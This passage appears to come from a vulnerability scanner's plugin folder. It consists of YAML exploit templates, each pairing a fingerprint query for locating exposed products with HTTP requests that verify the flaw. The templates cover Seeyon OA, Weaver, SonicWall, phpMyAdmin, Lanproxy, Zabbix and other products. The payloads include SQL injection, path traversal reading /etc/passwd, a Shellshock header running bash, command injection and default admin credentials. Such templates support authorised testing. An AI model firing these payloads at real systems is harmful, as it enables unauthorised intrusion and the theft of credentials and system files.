7 | - sql_injection
8 | description: Joomla departments 存在SQL注入漏洞
9 | homepage: https://www.joomla.org/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5(700),3,4,5,6,7,8--
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: e5841df2166dd424a57127423d276bbe
26 | type: contains
27 | create_at: "2022-05-24 16:27:00"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Kingdee EAS server_file Directory traversal.yaml:
--------------------------------------------------------------------------------
1 | app: 金蝶eas
2 | query: app:"金蝶eas"
3 | meta:
4 | name: Kingdee EAS server_file Directory traversal
5 | level: 2
6 | tags:
7 | - Directory Traversal
8 | description: Kingdee EAS server file Directory traversal,The attacker can obtain the sensitive information of the server through directory traversal
9 | homepage: https://www.kingdee.com/
10 | author: Administrator
11 | references: ""
12 | solution: Directory traversal
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /appmonitor/protected/selector/server_file/files?folder=/&suffix=
20 | redirect: true
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: ""
24 | response:
25 | - name: body
26 | value: folder
27 | type: contains
28 | - name: code
29 | value: "200"
30 | type: equals
31 | create_at: "2022-05-23 14:48:18"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Kingsoft V8 Default weak password.yaml:
--------------------------------------------------------------------------------
1 | app: 金山终端安全
2 | query: app:"金山终端安全"
3 | meta:
4 | name: Kingsoft V8 Default weak password
5 | level: 4
6 | tags:
7 | - weak_password
8 | description: The default weak password exists in the Jinshan V8 terminal security system, so the attacker can obtain all the host permissions (admin/admin)
9 | homepage: https://www.ejinshan.net/
10 | author: Administrator
11 | references: ""
12 | solution: the attacker can obtain all the host permissions
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: POST
19 | path: /inter/ajax.php?cmd=get_user_login_cmd
20 | redirect: true
21 | header: [ ]
22 | params: '{"get_user_login_cmd":{"name\":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}'
23 | response:
24 | - name: body
25 | value: userSession
26 | type: contains
27 | - name: code
28 | value: "200"
29 | type: equals
30 | create_at: "2022-05-23 14:51:45"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Kyan网络监控设备账号密码泄露漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: Kyan
2 | query: title:"platform - Login"
3 | meta:
4 | name: Kyan网络监控设备账号密码泄露漏洞
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: ' Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台。'
9 | homepage: ""
10 | author: Administrator
11 | references: https://blog.csdn.net/qq_36197704/article/details/115863364
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /hosts
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: UserName
29 | type: contains
30 | create_at: "2022-05-23 14:54:35"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/LanhaiZuoyue system debug.php RCE.yaml:
--------------------------------------------------------------------------------
1 | app: LanhaiZuoyue
2 | query: title:"蓝海卓越计费管理系统"
3 | meta:
4 | name: LanhaiZuoyue system debug.php RCE
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: ""
9 | homepage: https://www.cuoshui.com
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: POST
19 | path: /debug.php
20 | redirect: true
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: cmd=id
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: uid
30 | type: contains
31 | create_at: "2022-05-23 15:03:42"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/LanhaiZuoyue system download.php File read.yaml:
--------------------------------------------------------------------------------
1 | app: LanhaiZuoyue
2 | query: title:"蓝海卓越计费管理系统"
3 | meta:
4 | name: LanhaiZuoyue system download.php File read
5 | level: 3
6 | tags:
7 | - file_read
8 | description: ""
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /download.php?file=../../../../../etc/passwd
20 | redirect: false
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: ""
24 | response:
25 | - name: body
26 | value: 'root:'
27 | type: contains
28 | - name: code
29 | value: "200"
30 | type: equals
31 | create_at: "2022-05-23 15:05:49"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Lanproxy 目录遍历漏洞 CVE-2021-3019.yaml:
--------------------------------------------------------------------------------
1 | app: LanProxy
2 | query: app:"Lanproxy"
3 | meta:
4 | name: Lanproxy 目录遍历漏洞 CVE-2021-3019
5 | level: 3
6 | tags:
7 | - path_traversal
8 | description: Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。
9 | homepage: https://github.com/ffay/lanproxy
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /../conf/config.properties
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: server.ssl
29 | type: contains
30 | create_at: "2022-05-23 15:08:10"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.yaml:
--------------------------------------------------------------------------------
1 | app: MessageSolution
2 | query: title:"MessageSolution Enterprise Email Archiving (EEA)"
3 | meta:
4 | name: MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /authenticationserverservlet/
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: administrator
29 | type: contains
30 | create_at: "2022-05-23 15:10:43"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Portainer为创建用户导致未授权访问(CVE-2018-19367).yaml:
--------------------------------------------------------------------------------
1 | app: Portainer
2 | query: title:"Portainer"
3 | meta:
4 | name: Portainer为创建用户导致未授权访问(CVE-2018-19367)
5 | level: 4
6 | tags:
7 | - ultra_vires
8 | description: Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。
9 | homepage: https://portainer.io/
10 | author: Administrator
11 | references: https://github.com/lichti/shodan-portainer/
12 | solution: 升级至新版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /api/users/admin/check
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "404"
26 | type: equals
27 | create_at: "2022-05-23 11:00:29"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Ruijie smartweb weak password.yaml:
--------------------------------------------------------------------------------
1 | app: Ruijie
2 | query: app:"Ruijie"
3 | meta:
4 | name: Ruijie smartweb weak password
5 | level: 2
6 | tags:
7 | - weak_password
8 | description: Ruijie smartweb management system opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest)
9 | homepage: http://www.ruijie.com.cn/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: POST
19 | path: /WEB_VMS/LEVEL15/
20 | redirect: true
21 | header:
22 | - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
23 | params: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: 'Level was: LEVEL15'
30 | type: contains
31 | create_at: "2022-05-23 15:21:41"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/RuoYi Druid Unauthorized access.yaml:
--------------------------------------------------------------------------------
1 | app: Ruoyi
2 | query: body:"/ruoyi/"
3 | meta:
4 | name: RuoYi Druid Unauthorized access
5 | level: 2
6 | tags:
7 | - Disclosure of Sensitive Information
8 | description: If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information
9 | homepage: https://gitee.com/y_project/RuoYi-Vue
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /prod-api/druid/index.html
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: Druid Stat Index
29 | type: contains
30 | - name: body
31 | value: View JSON API
32 | type: contains
33 | create_at: "2022-05-23 15:24:32"
34 |
--------------------------------------------------------------------------------
/core/plugins/exploits/SDWAN智能网关应用系统弱口令.yaml:
--------------------------------------------------------------------------------
1 | app: "UniERM"
2 | query: body:"unierm_brand/logo.png"
3 | meta:
4 | name: SDWAN智能网关应用系统弱口令
5 | level: 3
6 | tags:
7 | - weak_password
8 | description: ""
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: POST
19 | path: /Login/Index/doLogin
20 | redirect: false
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
23 | params: username=admin&password=admin%40123
24 | response:
25 | - name: body
26 | value: "true"
27 | type: contains
28 | - name: body
29 | value: userid
30 | type: contains
31 | create_at: "2022-05-23 15:31:05"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Samsung WLAN AP WEA453e RCE.yaml:
--------------------------------------------------------------------------------
1 | app: Samsung WLAN AP WEA453e
2 | query: title:"Samsung WLAN AP"
3 | meta:
4 | name: Samsung WLAN AP WEA453e RCE
5 | level: 3
6 | tags:
7 | - remote_code_execution
8 | description: Samsung WLAN AP WEA453e router has a remote command execution vulnerability, which can execute arbitrary commands without authorization to obtain server permissions
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: POST
19 | path: /(download)/tmp/a.txt
20 | redirect: true
21 | header: [ ]
22 | params: command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: root
29 | type: contains
30 | create_at: "2022-05-23 15:26:34"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Seeyon OA A6 DownExcelBeanServlet User information leakage.yaml:
--------------------------------------------------------------------------------
1 | app: seeyon
2 | query: app:"seeyon"
3 | meta:
4 | name: Seeyon OA A6 DownExcelBeanServlet User information leakage
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: There is an unauthorized interface in Zhiyuan OA A6, so that any visitor can download the user information in OA
9 | homepage: https://www.seeyon.com
10 | author: Administrator
11 | references: ""
12 | solution: delete file
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: '@'
29 | type: contains
30 | create_at: "2022-05-23 15:39:10"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Seeyon OA A6 createMysql.jsp Disclosure of database sensitive information.yaml:
--------------------------------------------------------------------------------
1 | app: seeyon
2 | query: body:"致远协创A6"
3 | meta:
4 | name: Seeyon OA A6 createMysql.jsp Disclosure of database sensitive information
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: Seeyon OA A6 has database sensitive information disclosure. Attackers can obtain database account and password MD5 by accessing specific URL
9 | homepage: https://www.seeyon.com/
10 | author: Administrator
11 | references: ""
12 | solution: The attacker can access the specific URL to obtain the database account and password MD5
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /yyoa/createMysql.jsp
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: root
29 | type: contains
30 | create_at: "2022-05-23 15:36:15"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Seeyon OA A6 initDataAssess.jsp User information leakage.yaml:
--------------------------------------------------------------------------------
1 | app: seeyon
2 | query: app:"seeyon"
3 | meta:
4 | name: Seeyon OA A6 initDataAssess.jsp User information leakage
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: |-
9 | Seeyon OA A6 initDataAssess.jsp There is leakage of user sensitive information
10 | You can get the user name blasting user password into the background to further attack
11 | homepage: https://www.seeyon.com/
12 | author: Administrator
13 | references: ""
14 | solution: ""
15 | steps:
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: GET
21 | path: /yyoa/assess/js/initDataAssess.jsp
22 | redirect: false
23 | header: [ ]
24 | params: ""
25 | response:
26 | - name: code
27 | value: "200"
28 | type: equals
29 | - name: body
30 | value: personList
31 | type: contains
32 | - name: body
33 | value: /yyoa/index.jsp
34 | type: not contains
35 | create_at: "2022-05-23 15:41:05"
36 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Seeyon OA A6 setextno.jsp SQL injection.yaml:
--------------------------------------------------------------------------------
1 | app: seeyon
2 | query: app:"seeyon"
3 | meta:
4 | name: Seeyon OA A6 setextno.jsp SQL injection
5 | level: 3
6 | tags:
7 | - sql_injection
8 | description: Seeyon OA A6 setextno.jsp There is a SQL injection vulnerability, and the server can be controlled by injecting and writing webshell files
9 | homepage: https://www.seeyon.com/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=%2899999%29%20union%20all%20select%201,2,%28md5%281%29%29,4
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: c4ca4238a0b923820dcc509a6f75849b
29 | type: contains
30 | create_at: "2022-05-23 15:42:34"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Seeyon OA A8-m Information leakage.yaml:
--------------------------------------------------------------------------------
1 | app: seeyon
2 | query: app:"seeyon"
3 | meta:
4 | name: Seeyon OA A8-m Information leakage
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: Seeyon OA A8-m has state monitoring page information leakage, from which attackers can obtain sensitive information such as website path and user name for further attack
9 | homepage: https://www.seeyon.com/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /seeyon/management/index.jsp
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: Password
26 | type: contains
27 | - name: code
28 | value: "200"
29 | type: equals
30 | create_at: "2022-05-23 15:47:51"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Selea OCR-ANPR get_file.php File read.yaml:
--------------------------------------------------------------------------------
1 | app: Selea OCR-ANPR
2 | query: title:"Selea ANPR Camera"
3 | meta:
4 | name: Selea OCR-ANPR get_file.php File read
5 | level: 3
6 | tags:
7 | - file_read
8 | description: Selea OCR-ANPR get_file.php File read
9 | homepage: https://www.selea.com/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /cgi-bin/get_file.php
20 | redirect: true
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: name=pq&files_list=/etc/passwd
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: etc/passwd
30 | type: contains
31 | create_at: "2022-05-23 15:51:41"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/ShopXO download File read (CNVD-2021-15822).yaml:
--------------------------------------------------------------------------------
1 | app: shopxo
2 | query: app:"shopxo"
3 | meta:
4 | name: ShopXO download File read (CNVD-2021-15822)
5 | level: 3
6 | tags:
7 | - file_read
8 | description: Shopxo is an open source enterprise level open source e-commerce system. Shopxo has an arbitrary file read vulnerability that an attacker can use to obtain sensitive information
9 | homepage: https://www.shopxo.net/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
20 | redirect: true
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: ""
24 | response:
25 | - name: body
26 | value: 'root:'
27 | type: contains
28 | - name: code
29 | value: "200"
30 | type: equals
31 | create_at: "2022-05-23 15:56:21"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/SonicWall SSL-VPN 远程命令执行漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: SONICWALL-SSL-VPN
2 | query: app:"SonicWall-SSL-VPN"
3 | meta:
4 | name: SonicWall SSL-VPN 远程命令执行漏洞
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞
9 | homepage: https://www.sonicwall.com
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /cgi-bin/jarrewrite.sh
20 | redirect: true
21 | header:
22 | - User-Agent: () { :; }; echo ; /bin/bash -c 'cat /etc/passwd'
23 | params: ""
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: 'root:'
30 | type: contains
31 | create_at: "2022-05-23 16:02:35"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/TamronOS IPTV系统后台任意文件下载.yaml:
--------------------------------------------------------------------------------
1 | app: TamronOS-IPTV
2 | query: app:"TamronOS-IPTV"
3 | meta:
4 | name: TamronOS IPTV系统后台任意文件下载
5 | level: 3
6 | tags:
7 | - file_download
8 | description: ""
9 | homepage: http://www.tamronos.com/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /download/backup?name=../../../../../../../../etc/passwd
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: 'root:'
29 | type: contains
30 | create_at: "2022-05-23 16:08:49"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/WangKang NS-ASG cert_download.php File read.yaml:
--------------------------------------------------------------------------------
1 | app: netentsec
2 | query: app:"netentsec"
3 | meta:
4 | name: WangKang NS-ASG cert_download.php File read
5 | level: 3
6 | tags:
7 | - file_read
8 | description: WangKang NS-ASG cert_download.php File read
9 | homepage: https://www.netentsec.com/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
20 | redirect: true
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: ""
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: readfile
30 | type: contains
31 | create_at: "2022-05-23 16:27:57"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Weaver OA 8 SQL injection.yaml:
--------------------------------------------------------------------------------
1 | app: Weaver
2 | query: app:"weaver"
3 | meta:
4 | name: Weaver OA 8 SQL injection
5 | level: 3
6 | tags:
7 | - sql_injection
8 | description: There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges
9 | homepage: https://www.weaver.com.cn/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: 请退出并重新访问
29 | type: not contains
30 | - name: body
31 | value:
32 | type: contains
33 | create_at: "2021-11-08 22:03:28"
34 |
--------------------------------------------------------------------------------
/core/plugins/exploits/ecologyoa_clusterupgrade_-_upload.yaml:
--------------------------------------------------------------------------------
1 | app: Weaver
2 | query: app:"Weaver"
3 | meta:
4 | name: EcologyOA clusterupgrade - upload
5 | level: 4
6 | tags:
7 | - file_upload
8 | description: EcologyOA clusterupgrade interface has file upload vulnerability
9 | homepage: ""
10 | author: X prism
11 | references: ""
12 | solution: Update to new version
13 | create_at: "2024-07-13 12:35:15"
14 | available: false
15 | steps:
16 | variable: []
17 | verify_steps:
18 | type: and
19 | verify:
20 | - request:
21 | method: GET
22 | path: /clusterupgrade/uploadFileClient.jsp
23 | redirect: true
24 | header: []
25 | params: ""
26 | response:
27 | - name: body
28 | value: 安全校验失败
29 | type: contains
30 | exploit_steps:
31 | type: ""
32 | params:
33 | name: ""
34 | type: input
35 | value: ""
36 |
--------------------------------------------------------------------------------
/core/plugins/exploits/fahuo100_sql_injection_CNVD_2021_30193.yaml:
--------------------------------------------------------------------------------
1 | app: 发货100
2 | query: 'header:"Cache-Control: no-store, no-cache"'
3 | meta:
4 | name: fahuo100_sql_injection_CNVD_2021_30193
5 | level: 4
6 | tags:
7 | - sql_injection
8 | description: 发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息
9 | homepage: https://www.fahuo100.cn
10 | author: Administrator
11 | references: ""
12 | solution: 升级至安全版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /?M_id=1'&type=product
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: mysql
26 | type: contains
27 | - name: body
28 | value: Warning
29 | type: contains
30 | create_at: "2022-05-23 11:59:29"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/landray-OA-Arbitrary-file-read.yaml:
--------------------------------------------------------------------------------
1 | app: Landray
2 | query: app:"Landray"
3 | meta:
4 | name: landray-OA-Arbitrary-file-read
5 | level: 3
6 | tags:
7 | - file_read
8 | description: 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。
9 | homepage: ""
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /sys/ui/extend/varkind/custom.jsp
20 | redirect: true
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: var={"body":{"file":"file:///etc/passwd"}}
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: root
30 | type: equals
31 | create_at: "2022-05-23 15:00:38"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/phpmyadmin_反序列化漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: phpMyAdmin
2 | query: app:"phpmyadmin"
3 | meta:
4 | name: phpmyadmin 反序列化漏洞
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。
9 | homepage: https://www.phpmyadmin.net/
10 | author: Administrator
11 | references: https://blog.csdn.net/qq_41832837/article/details/110277824
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /scripts/setup.php
20 | redirect: true
21 | header: [ ]
22 | params: action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: 'root:'
29 | type: contains
30 | create_at: "2022-05-24 16:36:09"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/phpunit CVE_2017_9841 远程代码执行.yaml:
--------------------------------------------------------------------------------
1 | app: phpunit
2 | query: app:"php"
3 | meta:
4 | name: phpunit CVE_2017_9841 远程代码执行
5 | level: 3
6 | tags:
7 | - remote_code_execution
8 | description: composer是php包管理工具,使用composer安装扩展包将会在当前目录创建一个vendor文件夹,并将所有文件放在其中。
9 | homepage: phpunit
10 | author: 一曲成殇
11 | references: https://blog.csdn.net/qq_45688822/article/details/115567143
12 | solution: 设置接口访问权限
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
20 | redirect: true
21 | header: [ ]
22 | params:
23 | response:
24 | - name: body
25 | value: PHP Version
26 | type: contains
27 | create_at: "2022-04-27 14:59:06"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/weaver_e-cology_beanshell_-_remote_command_execution.yaml:
--------------------------------------------------------------------------------
1 | app: Weaver
2 | query: app:"Weaver"
3 | meta:
4 | name: Weaver E-Cology BeanShell - Remote Command Execution
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: ' Weaver BeanShell contains a remote command execution vulnerability
9 | in the bsh.servlet.BshServlet program.'
10 | homepage: ""
11 | author: X prism
12 | references: ""
13 | solution: Upload to new versiono
14 | create_at: "2024-07-13 12:16:36"
15 | available: false
16 | steps:
17 | variable: []
18 | verify_steps:
19 | type: and
20 | verify:
21 | - request:
22 | method: POST
23 | path: /weaver/bsh.servlet.BshServlet
24 | redirect: true
25 | header:
26 | - Content-Type: application/x-www-form-urlencoded
27 | params: ' bsh.script=print%28%22xaaaaa%22%29%3B'
28 | response:
29 | - name: body
30 | value: xaaaaa
31 | type: contains
32 | exploit_steps:
33 | type: ""
34 | params:
35 | name: ""
36 | type: input
37 | value: ""
38 |
--------------------------------------------------------------------------------
/core/plugins/exploits/weblogic_任意文件上传漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: WebLogic
2 | query: app:"Weblogic"
3 | meta:
4 | name: Weblogic 任意文件上传漏洞
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: 配置中启用 Web 服务测试页后,未授权的两个页面存在任意上传getshell漏洞,利用该漏洞可以上传任意jsp文件,进而获取服务器权限
9 | homepage: https://www.oracle.com/java/weblogic/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /ws_utc/config.do
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: Work Home Dir
29 | type: contains
30 | create_at: "2022-05-24 16:42:48"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/yapi_rce.yaml:
--------------------------------------------------------------------------------
1 | app: YApi
2 | query: app:"YApi"
3 | meta:
4 | name: YAPI RCE
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。
9 | homepage: https://github.com/YMFE/yapi
10 | author: Administrator
11 | references: https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /api/user/reg
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: 邮箱不能为空
26 | type: contains
27 | - name: body
28 | value: 禁止注册,请联系管理员
29 | type: not contains
30 | - name: code
31 | value: "200"
32 | type: equals
33 | create_at: "2022-06-09 15:31:18"
34 |
--------------------------------------------------------------------------------
/core/plugins/exploits/zabbix_默认账户漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: Zabbix
2 | query: app:"Zabbix"
3 | meta:
4 | name: zabbix 默认账户漏洞
5 | level: 4
6 | tags:
7 | - weak_password
8 | description: |-
9 | 默认账号Admin
10 | 默认密码为zabbix
11 | homepage: https://www.zabbix.com/
12 | author: Administrator
13 | references: ""
14 | solution: ""
15 | steps:
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: POST
21 | path: /index.php
22 | redirect: true
23 | header:
